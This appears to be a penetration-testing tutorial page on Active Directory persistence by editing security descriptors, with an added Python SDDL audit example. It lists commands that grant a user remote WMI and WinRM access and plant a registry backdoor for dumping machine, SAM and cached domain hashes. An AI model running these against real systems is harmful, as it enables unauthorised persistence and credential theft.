hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md
2024-02-10 17:52:19 +00:00


Security Descriptors

From the docs: Security Descriptor Definition Language (SDDL) defines the string format used to describe a security descriptor. SDDL uses ACE strings for the DACL and the SACL, each with the fields: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

A security descriptor stores the permissions that principals have over an object. If you can make even a small change to the security descriptor of an object, you can obtain very interesting privileges over that object without needing to be a member of a privileged group.

This persistence technique is therefore based on granting an account exactly the privileges it needs on certain objects, so that it can perform a task that usually requires admin privileges without being an admin.
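As an added example (not code from the original page or from the tools it cites), a small Python parser for the ACE-string format above, used to audit a descriptor for allow entries granted to trustees that are not on an expected list, which is exactly the kind of change the techniques below introduce. The WinRM-style baseline string, the expected-SID set and the S-1-5-21 SID are constructed samples.

```python
import re

# Fields of one ACE string, in the order the page gives them:
# ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
ACE_FIELDS = ("type", "flags", "rights", "object_guid", "inherit_object_guid", "sid")
ACE_RE = re.compile(r"\(([^)]*)\)")                      # one (...) group per ACE
SECTION_RE = re.compile(r"([OGDS]):(.*?)(?=[OGDS]:|$)")  # O:, G:, D:, S: sections

def parse_ace(ace):
    """Split 'A;;GA;;;BA' into a dict; rights become 2-letter codes or a hex mask."""
    fields = ace.split(";")
    if len(fields) < 6:
        raise ValueError(f"malformed ACE: ({ace})")
    entry = dict(zip(ACE_FIELDS, fields[:6]))  # a 7th field (conditional ACE) is ignored
    rights = entry["rights"]
    entry["rights"] = ([rights] if rights.lower().startswith("0x")
                       else re.findall(r"[A-Z]{2}", rights))
    return entry

def parse_sddl(sddl):
    """Return owner, group and the DACL/SACL ACE lists of an SDDL string."""
    desc = {"owner": None, "group": None, "dacl": [], "sacl": []}
    for key, body in SECTION_RE.findall(sddl):
        if key == "O":
            desc["owner"] = body
        elif key == "G":
            desc["group"] = body
        else:  # D: or S: -> optional flags (e.g. P, AI) followed by the ACEs
            desc["dacl" if key == "D" else "sacl"] = [parse_ace(a) for a in ACE_RE.findall(body)]
    return desc

def unexpected_grants(sddl, expected_sids):
    """Allow-type DACL entries (A, OA, XA) whose trustee is not one of the expected SIDs."""
    return [a for a in parse_sddl(sddl)["dacl"]
            if a["type"].endswith("A") and a["sid"] not in expected_sids]

# Constructed samples: a descriptor modelled on the WinRM default (BA = Builtin Admins,
# IU = Interactive Users) and the same descriptor with an extra full-control (GA) ACE
# for a domain account whose SID is a constructed placeholder.
BASELINE = "O:NSG:BAD:P(A;;GA;;;BA)(A;;GR;;;IU)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)"
ADDED_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"
MODIFIED = BASELINE.replace("S:P", f"(A;;GA;;;{ADDED_SID})S:P")

if __name__ == "__main__":
    for name, sddl in (("baseline", BASELINE), ("modified", MODIFIED)):
        for ace in unexpected_grants(sddl, {"BA", "IU"}):
            print(f"{name}: unexpected rights {ace['rights']} granted to {ace['sid']}")
```

Comparing a live descriptor against a known-good expected-SID set this way surfaces the extra trustee that the commands below add, whether on a WMI namespace, the WinRM root SDDL or a registry key.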

Access to WMI

You can give a user access to execute WMI remotely using this:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose #Remove

Access to WinRM

Give a user access to the WinRM PowerShell console using this:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Remote access to hashes

Access the registry and dump hashes by creating a registry backdoor with DAMP (HarmJ0y/DAMP), so that at any moment you can retrieve the hash of the computer account, the SAM hashes and any AD credentials cached on the computer. This is why granting this permission to a regular user on a Domain Controller is so useful:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Check Silver Tickets to learn how you could use the hash of the computer account of a Domain Controller.